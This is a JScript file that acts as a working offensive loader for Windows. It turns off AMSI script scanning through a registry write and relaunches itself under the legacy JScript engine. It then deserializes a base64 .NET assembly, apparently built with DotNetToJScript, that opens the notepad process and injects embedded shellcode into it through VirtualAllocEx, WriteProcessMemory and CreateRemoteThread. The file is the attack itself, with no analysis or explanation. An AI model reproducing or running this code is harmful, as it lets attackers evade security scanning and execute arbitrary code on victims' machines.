var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
 var AmsiEnable = sh.RegRead(key);
 if(AmsiEnable!=0){
 throw new Error(1, '');
 }
}catch(e){
 sh.RegWrite(key, 0, "REG_DWORD");
 sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
 sh.RegWrite(key, 1, "REG_DWORD");
 WScript.Quit(1);
}

function setversion() {
    new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
    }
    function debug(s) {}
    function base64ToStream(b) {
        var enc = new ActiveXObject("System.Text.ASCIIEncoding");
        var length = enc.GetByteCount_2(b);
        var ba = enc.GetBytes_4(b);
        var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
        ba = transform.TransformFinalBlock(ba, 0, length);
        var ms = new ActiveXObject("System.IO.MemoryStream");
        ms.Write(ba, 0, (length / 4) * 3);
        ms.Position = 0;
        return ms;
    }
    
    var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
    "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
    "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
    "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
    "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
    "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
    "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
    "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
    "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
    "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
    "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
    "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
    "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
    "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
    "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
    "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
    "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
    "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
    "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
    "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
    "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
    "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
    "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAZkXVYgAAAAAA"+
    "AAAA4AAiIAsBMAAAEAAAAAgAAAAAAABmLQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAYA"+
    "AAAAAAAAAIAAAAACAAAAAAAAAwBghQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAFC0A"+
    "AE8AAAAAQAAADAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAANwrAAAcAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
    "AAAALnRleHQAAACsDgAAACAAAAAQAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAADAQAAABA"+
    "AAAABgAAABIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAYAAAAAAAAAAAA"+
    "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAEgtAAAAAAAASAAAAAIABQAkIQAAuAoAAAEAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzAHAL4AAAAB"+
    "AAARAigQAAAKAAByAQAAcCgRAAAKCgaOFv4BCwcsEQByEQAAcCgSAAAKADiQAAAAAHI3AABwBhaa"+
    "bxMAAAoTBxIHKBQAAAooFQAACigSAAAKACD/Dx8AFgYWmm8TAAAKKAEAAAYMCH4WAAAKIAAQAAAg"+
    "ADAAAB9AKAIAAAYNID8BAACNGAAAASXQAQAABCgXAAAKEwQICREEEQSOaRIFKAMAAAYmCH4WAAAK"+
    "Fgl+FgAAChZ+FgAACigEAAAGEwYAKiYAAygYAAAKJipCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMx"+
    "OQAAAAAFAGwAAAB8AwAAI34AAOgDAAC0BAAAI1N0cmluZ3MAAAAAnAgAAFwAAAAjVVMA+AgAABAA"+
    "AAAjR1VJRAAAAAgJAACwAQAAI0Jsb2IAAAAAAAAAAgAAAVeVAjQJAgAAAPoBMwAWAAABAAAAGwAA"+
    "AAQAAAABAAAABgAAABUAAAAYAAAAEAAAAAEAAAABAAAAAQAAAAQAAAABAAAAAQAAAAIAAAABAAAA"+
    "AAD3AgEAAAAAAAYAGQKUAwYAhgKUAwYATQFiAw8AtAMAAAYAdQEpAwYA/AEpAwYA3QEpAwYAbQIp"+
    "AwYAOQIpAwYAUgIpAwYAjAEpAwYAYQF1AwYAPwF1AwYAwAEpAwYApwHCAgYAWwQLAwoAJQRiAwYA"+
    "JAGUAwYAAwELAwYA6AALAwYAAQALAwYA3gILAwYAWwMLAwYApAILAwYA5gOUAwYAiwQLAwYAxgAL"+
    "AwAAAAAlAAAAAAABAAEAAQAQAPUDAABBAAEAAQAAAQAALgAAAEEAAQAHABMBAAAHAAAATQACAAcA"+
    "MwFNAFwAAAAAAIAAkSAWBGAAAQAAAAAAgACRIHIEZwAEAAAAAACAAJEgoQRwAAkAAAAAAIAAkSCz"+
    "AHsADgBQIAAAAACGGFUDBgAVABohAAAAAIYAIgQQABUAAAABAP8DAAACANkAAAADAKkAAAABAA0E"+
    "AAACADsEAAADALsCAAAEAA0BAAAFAGIEAAABAA0EAAACAC0EAAADAEADAAAEALUCAgAFABIDAAAB"+
    "AA0EAAACAMMDAAADAKkCAAAEAEUEAAAFAEkDAAAGANYDAAAHAJ4AAAABAOUCCQBVAwEAEQBVAwYA"+
    "GQBVAwoAKQBVAxAAMQBVAxAAOQBVAxAAQQBVAxAASQBVAxAAUQBVAxAAWQBVAxAAYQBVAxUAaQBV"+
    "AxAAcQBVAxAAeQBVAxAAkQBVAwYAgQBVAwYAiQDwACgAoQAeAS8AiQCXADQAqQDcAjgAsQBUBDwA"+
    "uQA7A0IAyQCBBEUAiQBsBE0ALgALAIYALgATAI8ALgAbAK4ALgAjALcALgArAMwALgAzAPYALgA7"+
    "APYALgBDALcALgBLAPwALgBTAPYALgBbAPYALgBjACEBLgBrAEsBLgBzAFgBQwBbAKIBYwB7AKgB"+
    "AQA/AQAABAAaAOoCQQEDABYEAQBBAQUAcgQBAAABBwChBAEAAAEJALMAAQBsLQAAAQAEgAAAAQAA"+
    "AAAAAAAAAAAAAACRBAAABAAAAAAAAAAAAAAAUwCOAAAAAAAEAAAAAAAAAAAAAABTAAsDAAAAAAQA"+
    "AwAAAAAAAEludDMyAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MzE5ADxNb2R1bGU+ADxQcml2"+
    "YXRlSW1wbGVtZW50YXRpb25EZXRhaWxzPgA5MUYxRTZERjU0QTBDMzI4MDZERDhEOEZFNTBBNEI5"+
    "RUE2NzI5Q0ZBM0E0NjAzQUM1RDM1OTJCODVEMEVGREVFAG1zY29ybGliAGdldF9JZABscFRocmVh"+
    "ZElkAHByb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAUnVudGltZUZpZWxkSGFuZGxlAGJJbmhl"+
    "cml0SGFuZGxlAENvbnNvbGUAR2V0UHJvY2Vzc2VzQnlOYW1lAFZhbHVlVHlwZQBmbEFsbG9jYXRp"+
    "b25UeXBlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVi"+
    "dWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1"+
    "dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFz"+
    "c2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRl"+
    "AEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJp"+
    "YnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUA"+
    "QXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5"+
    "dGUAZHdTdGFja1NpemUAblNpemUAZHdTaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9T"+
    "dHJpbmcAcGF0aABrZXJuZWwzMi5kbGwARXhhbXBsZUFzc2VtYmx5LmRsbABTeXN0ZW0AbHBOdW1i"+
    "ZXJPZkJ5dGVzV3JpdHRlbgBTeXN0ZW0uUmVmbGVjdGlvbgBaZXJvAGxwQnVmZmVyAGxwUGFyYW1l"+
    "dGVyAC5jdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJv"+
    "cFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMA"+
    "bHBUaHJlYWRBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBSdW50aW1lSGVscGVycwBUZXN0Q2xh"+
    "c3MAcHJvY2Vzc0FjY2VzcwBoUHJvY2VzcwBPcGVuUHJvY2VzcwBSdW5Qcm9jZXNzAGxwQmFzZUFk"+
    "ZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AFN0"+
    "YXJ0AFZpcnR1YWxBbGxvY0V4AEluaXRpYWxpemVBcnJheQBFeGFtcGxlQXNzZW1ibHkAV3JpdGVQ"+
    "cm9jZXNzTWVtb3J5AAAPbgBvAHQAZQBwAGEAZAAAJVAAcgBvAGMAZQBzAHMAIABuAG8AdAAgAGYA"+
    "bwB1AG4AZAAhAAAjSQBEACAAbwBmACAAbgBvAHQAZQBwAGEAZAAgAGkAcwAgAAAA7su9w2aB0U+A"+
    "PfKLt627+QAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDQcIHRJFAhgYHQUYGAgGAAEdEkUOBAAB"+
    "AQ4DIAAIAyAADgUAAg4ODgIGGAcAAgESaRFtBQABEkUOCLd6XFYZNOCJAwYREAYAAxgJAggIAAUY"+
    "GBgJCQkKAAUCGBgdBQgQGAoABxgYGAkYGAkYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0"+
    "aW9uVGhyb3dzAQgBAAcBAAAAABQBAA9FeGFtcGxlQXNzZW1ibHkAACkBACRFeGFtcGxlIEFzc2Vt"+
    "Ymx5IGZvciBEb3ROZXRUb0pTY3JpcHQAAAUBAAAAACQBAB9Db3B5cmlnaHQgwqkgSmFtZXMgRm9y"+
    "c2hhdyAyMDE3AAApAQAkNTY1OThmMWMtNmQ4OC00OTk0LWEzOTItYWYzMzdhYmU1Nzc3AAAMAQAH"+
    "MS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC44AQBUDhRGcmFtZXdvcmtEaXNw"+
    "bGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjgFAQABAAAEAQAAAAAAAAAAAABmRdViAAAAAAIAAAAc"+
    "AQAA+CsAAPgNAABSU0RTVo/6vCYIEEuCRzU44kItjwEAAABDOlxVc2Vyc1xtaXN0aGlvc1xjb2Rl"+
    "cGxheVxEb3ROZXRUb0pTY3JpcHRcRXhhbXBsZUFzc2VtYmx5XG9ialxEZWJ1Z1xFeGFtcGxlQXNz"+
    "ZW1ibHkucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAADwtAAAAAAAAAAAAAFYtAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABILQAAAAAA"+
    "AAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABBIMclIgend////SI0F7///"+
    "/0i7tpEYKxwFkhtIMVgnSC34////4vRK2ZvP7O1SG7aRWXpdVcBK4Nkp+XlNGUnW2ZN5BE0ZSZbZ"+
    "k1lMTZ2s/NtVGtVNo9sarXlXHimyWndYFWodxHD25NBJY5dXspD0rVAqzI4Sk7aRGGOZxeZ8/pDI"+
    "e5dNil890ThiHdVxTf5u0WqXMRpTt0dVGtVNo9sa0NniEUST2o5xbdpQBt4/vtQh+mndyl890Txi"+
    "HdX0Wj2dUG+XRY5St0FZoBiN2hpm0EBqRFvLQffJWXJdX9qYWrFZeePlylrvy1CgDuzF5EluRWOm"+
    "BJIbtpEYKxxNH5a3kBgrXb+jkNkW5/6n9Se54NCijYm4D+Rj2ZvvNDmUZ7wR48tpAClcpeN3QRxc"+
    "05Jsbs1IfWnxNdPpfSscBZIbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEA"+
    "AQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAsAMAAAAAAAAAAAAAsAM0AAAAVgBT"+
    "AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8A"+
    "AAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
    "ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBBADAAABAFMAdAByAGkAbgBnAEYA"+
    "aQBsAGUASQBuAGYAbwAAAOwCAAABADAAMAAwADAAMAA0AGIAMAAAAGIAJQABAEMAbwBtAG0AZQBu"+
    "AHQAcwAAAEUAeABhAG0AcABsAGUAIABBAHMAcwBlAG0AYgBsAHkAIABmAG8AcgAgAEQAbwB0AE4A"+
    "ZQB0AFQAbwBKAFMAYwByAGkAcAB0AAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAA"+
    "AAAAAABIABAAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARQB4AGEAbQBwAGwA"+
    "ZQBBAHMAcwBlAG0AYgBsAHkAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAw"+
    "AC4AMAAuADAAAABIABQAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAeABhAG0AcABsAGUA"+
    "QQBzAHMAZQBtAGIAbAB5AC4AZABsAGwAAABiAB8AAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBo"+
    "AHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIABKAGEAbQBlAHMAIABGAG8AcgBzAGgAYQB3ACAA"+
    "MgAwADEANwAAAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABQ"+
    "ABQAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQB4AGEAbQBwAGwAZQBBAHMA"+
    "cwBlAG0AYgBsAHkALgBkAGwAbAAAAEAAEAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAARQB4"+
    "AGEAbQBwAGwAZQBBAHMAcwBlAG0AYgBsAHkAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMA"+
    "aQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBp"+
    "AG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAIAAADAAAAGg9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
    "AAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZsZWN0"+
    "aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
    var entry_class = 'TestClass';
    
    try {
        setversion();
        var stm = base64ToStream(serialized_obj);
        var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
        var al = new ActiveXObject('System.Collections.ArrayList');
        var d = fmt.Deserialize_2(stm);
        al.Add(undefined);
        var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
        
    } catch (e) {
        debug(e.message);
    }